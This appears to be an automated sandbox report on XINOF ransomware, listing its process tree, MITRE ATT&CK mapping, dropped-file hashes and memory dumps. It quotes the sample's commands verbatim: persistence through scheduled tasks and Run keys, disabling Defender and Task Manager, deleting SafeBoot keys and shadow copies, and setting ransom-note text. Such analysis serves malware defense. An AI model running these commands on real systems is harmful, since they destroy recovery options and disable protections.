PID 1800 wrote to memory of 1668	1800	cmd.exe	reg.exe
PID 1800 wrote to memory of 1668	1800	cmd.exe	reg.exe
PID 744 wrote to memory of 1664	744	XINOF4.2.1.exe	cmd.exe
PID 744 wrote to memory of 1664	744	XINOF4.2.1.exe	cmd.exe
PID 744 wrote to memory of 1664	744	XINOF4.2.1.exe	cmd.exe
PID 1664 wrote to memory of 1220	1664	cmd.exe	reg.exe
PID 1664 wrote to memory of 1220	1664	cmd.exe	reg.exe
PID 1664 wrote to memory of 1220	1664	cmd.exe	reg.exe
PID 744 wrote to memory of 824	744	XINOF4.2.1.exe	cmd.exe
PID 744 wrote to memory of 824	744	XINOF4.2.1.exe	cmd.exe
PID 744 wrote to memory of 824	744	XINOF4.2.1.exe	cmd.exe
PID 824 wrote to memory of 1252	824	cmd.exe	schtasks.exe
PID 824 wrote to memory of 1252	824	cmd.exe	schtasks.exe
PID 824 wrote to memory of 1252	824	cmd.exe	schtasks.exe
PID 744 wrote to memory of 1280	744	XINOF4.2.1.exe	cmd.exe
PID 744 wrote to memory of 1280	744	XINOF4.2.1.exe	cmd.exe
PID 744 wrote to memory of 1280	744	XINOF4.2.1.exe	cmd.exe
PID 1280 wrote to memory of 1592	1280	cmd.exe	schtasks.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

1896 attrib.exe

pid	process
1896	attrib.exe

C:\Users\Admin\AppData\Local\Temp\XINOF4.2.1.exe
"C:\Users\Admin\AppData\Local\Temp\XINOF4.2.1.exe"
1⤵
- Modifies extensions of user files
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c chcp 437
2⤵
- Suspicious use of WriteProcessMemory
PID:1900

C:\Windows\system32\chcp.com
chcp 437
3⤵
PID:1992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN fonix /TR C:\ProgramData\XINOF.exe /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:2020

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN fonix /TR C:\ProgramData\XINOF.exe /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:2032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\XINOF.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"
2⤵
PID:1160

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\XINOF.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"
2⤵
PID:1184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN fonix /TR C:\ProgramData\XINOF.exe /F
2⤵
- Suspicious use of WriteProcessMemory
PID:1224

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN fonix /TR C:\ProgramData\XINOF.exe /F
3⤵
- Creates scheduled task(s)
PID:1212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:2036

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"
3⤵
- Views/modifies file attributes
PID:1896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1776

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f
3⤵
- Adds Run key to start application
PID:1320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1708

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f
3⤵
- Adds Run key to start application
PID:1780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1800

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f
3⤵
- Adds Run key to start application
PID:1668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1664

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f
3⤵
- Adds Run key to start application
PID:1220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN fonix11 /TR "C:\Users\Admin\AppData\Local\Temp\XINOF4.2.1.exe" /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:824

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN fonix11 /TR "C:\Users\Admin\AppData\Local\Temp\XINOF4.2.1.exe" /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:1252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN fonix10 /TR "C:\Users\Admin\AppData\Local\Temp\XINOF4.2.1.exe" /F
2⤵
- Suspicious use of WriteProcessMemory
PID:1280

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN fonix10 /TR "C:\Users\Admin\AppData\Local\Temp\XINOF4.2.1.exe" /F
3⤵
- Creates scheduled task(s)
PID:1592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
2⤵
PID:1300

C:\Windows\system32\cmd.exe
cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
3⤵
PID:1536

C:\Windows\system32\icacls.exe
icacls * /grant Everyone:(OI)(CI)F /T /C /Q
4⤵
- Modifies file permissions
PID:328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
2⤵
PID:824

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
3⤵
PID:1436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql*
2⤵
PID:316

C:\Windows\system32\cmd.exe
cmd.exe /c taskkill /t /f /im sql*
3⤵
PID:332

C:\Windows\system32\taskkill.exe
taskkill /t /f /im sql*
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy Cpriv.key C:\ProgramData\Cpriv.key
2⤵
PID:676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy Cpub.key C:\ProgramData\Cpub.key
2⤵
PID:1212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy SystemID C:\ProgramData\SystemID
2⤵
PID:1892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v Manufacturer /t REG_SZ /d "XINOF Ransomware Version 3.3" /f
2⤵
PID:1704

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v Manufacturer /t REG_SZ /d "XINOF Ransomware Version 3.3" /f
3⤵
PID:1700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v SupportHours /t REG_SZ /d "24 * 7 * 365" /f
2⤵
PID:1792

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v SupportHours /t REG_SZ /d "24 * 7 * 365" /f
3⤵
PID:1692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v SupportPhone /t REG_SZ /d "contact us using this emails [email protected] [email protected] " /f
2⤵
PID:1680

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v SupportPhone /t REG_SZ /d "contact us using this emails [email protected] [email protected] " /f
3⤵
PID:1768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticecaption /t REG_SZ /d "ALL Your Files Has Been Encrypted Using XINOF v4.2" /f
2⤵
PID:852

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticecaption /t REG_SZ /d "ALL Your Files Has Been Encrypted Using XINOF v4.2" /f
3⤵
PID:1664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d "All of your files encrypted. If want to recover your files contact me by [email protected] [email protected] DO NOT reply to other emails. ONLY this two emails can help you." /f
2⤵
PID:1492

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d "All of your files encrypted. If want to recover your files contact me by [email protected] [email protected] DO NOT reply to other emails. ONLY this two emails can help you." /f
3⤵
PID:1564

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
2⤵
PID:1448

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
3⤵
PID:792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
2⤵
PID:756

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
3⤵
PID:316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
2⤵
PID:568

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
3⤵
PID:1716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
PID:560

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
3⤵
PID:856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:788

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
3⤵
PID:1544

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
PID:1912

C:\Windows\system32\reg.exe
reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
3⤵
PID:968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
PID:2044

C:\Windows\system32\reg.exe
reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
3⤵
PID:1496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label E: XINOF
2⤵
PID:1608

C:\Windows\system32\label.exe
Label E: XINOF
3⤵
- Enumerates connected drives
PID:1784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "How To Decrypt Files.hta"
2⤵
PID:1896

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\How To Decrypt Files.hta"
3⤵
- Modifies Internet Explorer settings
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label F: XINOF
2⤵
PID:1892

C:\Windows\system32\label.exe
Label F: XINOF
3⤵
- Enumerates connected drives
PID:1320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label G: XINOF
2⤵
PID:1712

C:\Windows\system32\label.exe
Label G: XINOF
3⤵
- Enumerates connected drives
PID:1800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label H: XINOF
2⤵
PID:1680

C:\Windows\system32\label.exe
Label H: XINOF
3⤵
- Enumerates connected drives
PID:1348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label I: XINOF
2⤵
PID:852

C:\Windows\system32\label.exe
Label I: XINOF
3⤵
- Enumerates connected drives
PID:1472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label J: XINOF
2⤵
PID:1492

C:\Windows\system32\label.exe
Label J: XINOF
3⤵
- Enumerates connected drives
PID:652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label K: XINOF
2⤵
PID:1448

C:\Windows\system32\label.exe
Label K: XINOF
3⤵
- Enumerates connected drives
PID:1328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label L: XINOF
2⤵
PID:756

C:\Windows\system32\label.exe
Label L: XINOF
3⤵
- Enumerates connected drives
PID:892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label M: XINOF
2⤵
PID:1588

C:\Windows\system32\label.exe
Label M: XINOF
3⤵
- Enumerates connected drives
PID:1604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label N: XINOF
2⤵
PID:856

C:\Windows\system32\label.exe
Label N: XINOF
3⤵
- Enumerates connected drives
PID:1324

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label A: XINOF
2⤵
PID:1544

C:\Windows\system32\label.exe
Label A: XINOF
3⤵
- Enumerates connected drives
PID:940

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label B: XINOF
2⤵
PID:1044

C:\Windows\system32\label.exe
Label B: XINOF
3⤵
- Enumerates connected drives
PID:1852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label O: XINOF
2⤵
PID:1964

C:\Windows\system32\label.exe
Label O: XINOF
3⤵
- Enumerates connected drives
PID:1920

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label P: XINOF
2⤵
PID:1840

C:\Windows\system32\label.exe
Label P: XINOF
3⤵
- Enumerates connected drives
PID:1388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label Q: XINOF
2⤵
PID:324

C:\Windows\system32\label.exe
Label Q: XINOF
3⤵
- Enumerates connected drives
PID:1184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label R: XINOF
2⤵
PID:952

C:\Windows\system32\label.exe
Label R: XINOF
3⤵
- Enumerates connected drives
PID:1548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label S: XINOF
2⤵
PID:300

C:\Windows\system32\label.exe
Label S: XINOF
3⤵
- Enumerates connected drives
PID:1948

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label T: XINOF
2⤵
PID:1252

C:\Windows\system32\label.exe
Label T: XINOF
3⤵
- Enumerates connected drives
PID:1520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label U: XINOF
2⤵
PID:1156

C:\Windows\system32\label.exe
Label U: XINOF
3⤵
- Enumerates connected drives
PID:2032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label V: XINOF
2⤵
PID:320

C:\Windows\system32\label.exe
Label V: XINOF
3⤵
- Enumerates connected drives
PID:1212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label W: XINOF
2⤵
PID:1784

C:\Windows\system32\label.exe
Label W: XINOF
3⤵
- Enumerates connected drives
PID:1696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label X: XINOF
2⤵
PID:1772

C:\Windows\system32\label.exe
Label X: XINOF
3⤵
- Enumerates connected drives
PID:1892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label Y: XINOF
2⤵
PID:1968

C:\Windows\system32\label.exe
Label Y: XINOF
3⤵
- Enumerates connected drives
PID:1800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label Z: XINOF
2⤵
PID:1236

C:\Windows\system32\label.exe
Label Z: XINOF
3⤵
- Enumerates connected drives
PID:1348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label C: XINOF
2⤵
PID:608

C:\Windows\system32\label.exe
Label C: XINOF
3⤵
PID:1592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label D: XINOF
2⤵
PID:1436

C:\Windows\system32\label.exe
Label D: XINOF
3⤵
- Enumerates connected drives
PID:1596

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet
2⤵
PID:1328

C:\Windows\system32\cmd.exe
cmd.exe /c vssadmin Delete Shadows /All /Quiet
3⤵
PID:328

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /All /Quiet
4⤵
- Interacts with shadow copies
PID:856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete
2⤵
PID:1536

C:\Windows\system32\cmd.exe
cmd.exe /c wmic shadowcopy delete
3⤵
PID:1588

C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
2⤵
PID:1544

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1304

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Modify Existing Service

T1031

Scheduled Task

T1053

Hidden Files and Directories

T1158

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Deletion

T1107

File Permissions Modification

T1222

Modify Registry

T1112

Hidden Files and Directories

T1158

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Cpriv.key
MD5
782dd2417f39e0a1abbc878b08549ea0

SHA1
58fde9de13b925a3a6bac117b7c7933f1f5d848d

SHA256
620dbbdf38434951cf97fbfa4068c611ebcc63afb9e7b9a425eba22241c61926

SHA512
2d320bdc41c6c95bb0aaa72a06030ac142d1b4a07e91c6769b5490d513ba46128ed0b5139b9953615a7ade20682c32b468c670b0d6edd24fd301352a3f2123f6

Download Submit
C:\ProgramData\Cpriv.key
MD5
782dd2417f39e0a1abbc878b08549ea0

SHA1
58fde9de13b925a3a6bac117b7c7933f1f5d848d

SHA256
620dbbdf38434951cf97fbfa4068c611ebcc63afb9e7b9a425eba22241c61926

SHA512
2d320bdc41c6c95bb0aaa72a06030ac142d1b4a07e91c6769b5490d513ba46128ed0b5139b9953615a7ade20682c32b468c670b0d6edd24fd301352a3f2123f6

Download Submit
C:\ProgramData\Cpub.key
MD5
c17edb9014c6cfd50aaa1d02084eb9d7

SHA1
adc60a5b0b67b8956b7062e7ac34886733606023

SHA256
6a1d530a6a4243855e8ffb03616c4f81940e5ef971732f7a8fe9aaad581652b1

SHA512
bb18952807acdd5a9ba337cdd7e4b6fe13d57f92bb0ee56d58dc583471a49266289ce36e2c7f4e811f77b2ab79697163061a5e3449978ff184ad22a9e0ed1868

Download Submit
C:\ProgramData\Cpub.key
MD5
c17edb9014c6cfd50aaa1d02084eb9d7

SHA1
adc60a5b0b67b8956b7062e7ac34886733606023

SHA256
6a1d530a6a4243855e8ffb03616c4f81940e5ef971732f7a8fe9aaad581652b1

SHA512
bb18952807acdd5a9ba337cdd7e4b6fe13d57f92bb0ee56d58dc583471a49266289ce36e2c7f4e811f77b2ab79697163061a5e3449978ff184ad22a9e0ed1868

Download Submit
C:\ProgramData\SystemID
MD5
d90ce24aa9ea50d9b337570ede915b14

SHA1
73151316bab34f6d2bc5205a91a500cbc7619ee2

SHA256
40800c1fe23f2a77b86ee8fd8c98d60695618e9efc8c46bdc2417cdd8a483bec

SHA512
ba49e4afeb0cab80f55403772d7088c4616dc16eceeee664bb0ac526f8811113786aac04e32f51ac44feac6ebd456c36c26cb26c382561b7de5a8dd933a062f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cpriv.key
MD5
782dd2417f39e0a1abbc878b08549ea0

SHA1
58fde9de13b925a3a6bac117b7c7933f1f5d848d

SHA256
620dbbdf38434951cf97fbfa4068c611ebcc63afb9e7b9a425eba22241c61926

SHA512
2d320bdc41c6c95bb0aaa72a06030ac142d1b4a07e91c6769b5490d513ba46128ed0b5139b9953615a7ade20682c32b468c670b0d6edd24fd301352a3f2123f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cpub.key
MD5
c17edb9014c6cfd50aaa1d02084eb9d7

SHA1
adc60a5b0b67b8956b7062e7ac34886733606023

SHA256
6a1d530a6a4243855e8ffb03616c4f81940e5ef971732f7a8fe9aaad581652b1

SHA512
bb18952807acdd5a9ba337cdd7e4b6fe13d57f92bb0ee56d58dc583471a49266289ce36e2c7f4e811f77b2ab79697163061a5e3449978ff184ad22a9e0ed1868

Download Submit
C:\Users\Admin\AppData\Local\Temp\How To Decrypt Files.hta
MD5
07e89a7abfaca1526f93059aa09ce756

SHA1
5a4a6b82eb0d8586b529ffcba480270ac5fd25ec

SHA256
7dda3df162462b48944af4283a5fd1cc861c7457a5eb1c1795cd15fabefc959b

SHA512
fe2be2ff16002bf4d5d5ae91854df628911f25e61e523f47a83551fbae8ae996f109f10277400897aaf1087fb58702a1111f5ccd60bc68e2f0c5eec774df9a05

Download Submit
C:\Users\Admin\AppData\Local\Temp\SystemID
MD5
d90ce24aa9ea50d9b337570ede915b14

SHA1
73151316bab34f6d2bc5205a91a500cbc7619ee2

SHA256
40800c1fe23f2a77b86ee8fd8c98d60695618e9efc8c46bdc2417cdd8a483bec

SHA512
ba49e4afeb0cab80f55403772d7088c4616dc16eceeee664bb0ac526f8811113786aac04e32f51ac44feac6ebd456c36c26cb26c382561b7de5a8dd933a062f4

Download Submit
memory/300-249-0x0000000000000000-mapping.dmp

Download
memory/316-200-0x0000000000000000-mapping.dmp

Download
memory/316-171-0x0000000000000000-mapping.dmp

Download
memory/320-255-0x0000000000000000-mapping.dmp

Download
memory/324-245-0x0000000000000000-mapping.dmp

Download
memory/328-271-0x0000000000000000-mapping.dmp

Download
memory/328-270-0x0000000000000000-mapping.dmp

Download
memory/328-176-0x0000000000000000-mapping.dmp

Download
memory/332-175-0x0000000000000000-mapping.dmp

Download
memory/332-173-0x0000000000000000-mapping.dmp

Download
memory/560-203-0x0000000000000000-mapping.dmp

Download
memory/568-201-0x0000000000000000-mapping.dmp

Download
memory/608-265-0x0000000000000000-mapping.dmp

Download
memory/652-228-0x0000000000000000-mapping.dmp

Download
memory/676-174-0x0000000000000000-mapping.dmp

Download
memory/744-23-0x0000000002880000-0x0000000002891000-memory.dmp

Filesize
68KB

Download
memory/744-22-0x0000000002470000-0x0000000002481000-memory.dmp

Filesize
68KB

Download
memory/744-24-0x0000000002470000-0x0000000002481000-memory.dmp

Filesize
68KB

Download
memory/744-166-0x0000000002470000-0x0000000002481000-memory.dmp

Filesize
68KB

Download
memory/744-212-0x0000000002C80000-0x0000000002C91000-memory.dmp

Filesize
68KB

Download
memory/744-213-0x0000000003090000-0x00000000030A1000-memory.dmp

Filesize
68KB

Download
memory/756-199-0x0000000000000000-mapping.dmp

Download
memory/756-231-0x0000000000000000-mapping.dmp

Download
memory/788-205-0x0000000000000000-mapping.dmp

Download
memory/792-198-0x0000000000000000-mapping.dmp

Download
memory/824-18-0x0000000000000000-mapping.dmp

Download
memory/824-168-0x0000000000000000-mapping.dmp

Download
memory/852-225-0x0000000000000000-mapping.dmp

Download
memory/852-193-0x0000000000000000-mapping.dmp

Download
memory/856-275-0x0000000000000000-mapping.dmp

Download
memory/856-235-0x0000000000000000-mapping.dmp

Download
memory/856-204-0x0000000000000000-mapping.dmp

Download
memory/892-232-0x0000000000000000-mapping.dmp

Download
memory/940-238-0x0000000000000000-mapping.dmp

Download
memory/952-247-0x0000000000000000-mapping.dmp

Download
memory/968-208-0x0000000000000000-mapping.dmp

Download
memory/1044-239-0x0000000000000000-mapping.dmp

Download
memory/1156-253-0x0000000000000000-mapping.dmp

Download
memory/1160-4-0x0000000000000000-mapping.dmp

Download
memory/1184-5-0x0000000000000000-mapping.dmp

Download
memory/1184-246-0x0000000000000000-mapping.dmp

Download
memory/1212-7-0x0000000000000000-mapping.dmp

Download
memory/1212-256-0x0000000000000000-mapping.dmp

Download
memory/1212-181-0x0000000000000000-mapping.dmp

Download
memory/1220-17-0x0000000000000000-mapping.dmp

Download
memory/1224-6-0x0000000000000000-mapping.dmp

Download
memory/1236-263-0x0000000000000000-mapping.dmp

Download
memory/1252-251-0x0000000000000000-mapping.dmp

Download
memory/1252-19-0x0000000000000000-mapping.dmp

Download
memory/1280-20-0x0000000000000000-mapping.dmp

Download
memory/1300-167-0x0000000000000000-mapping.dmp

Download
memory/1320-218-0x0000000000000000-mapping.dmp

Download
memory/1320-11-0x0000000000000000-mapping.dmp

Download
memory/1324-236-0x0000000000000000-mapping.dmp

Download
memory/1328-230-0x0000000000000000-mapping.dmp

Download
memory/1328-269-0x0000000000000000-mapping.dmp

Download
memory/1348-264-0x0000000000000000-mapping.dmp

Download
memory/1348-224-0x0000000000000000-mapping.dmp

Download
memory/1388-244-0x0000000000000000-mapping.dmp

Download
memory/1436-172-0x0000000000000000-mapping.dmp

Download
memory/1436-267-0x0000000000000000-mapping.dmp

Download
memory/1448-229-0x0000000000000000-mapping.dmp

Download
memory/1448-197-0x0000000000000000-mapping.dmp

Download
memory/1472-226-0x0000000000000000-mapping.dmp

Download
memory/1492-227-0x0000000000000000-mapping.dmp

Download
memory/1492-195-0x0000000000000000-mapping.dmp

Download
memory/1496-210-0x0000000000000000-mapping.dmp

Download
memory/1520-252-0x0000000000000000-mapping.dmp

Download
memory/1536-272-0x0000000000000000-mapping.dmp

Download
memory/1536-169-0x0000000000000000-mapping.dmp

Download
memory/1536-170-0x0000000000000000-mapping.dmp

Download
memory/1544-237-0x0000000000000000-mapping.dmp

Download
memory/1544-206-0x0000000000000000-mapping.dmp

Download
memory/1544-276-0x0000000000000000-mapping.dmp

Download
memory/1548-248-0x0000000000000000-mapping.dmp

Download
memory/1564-196-0x0000000000000000-mapping.dmp

Download
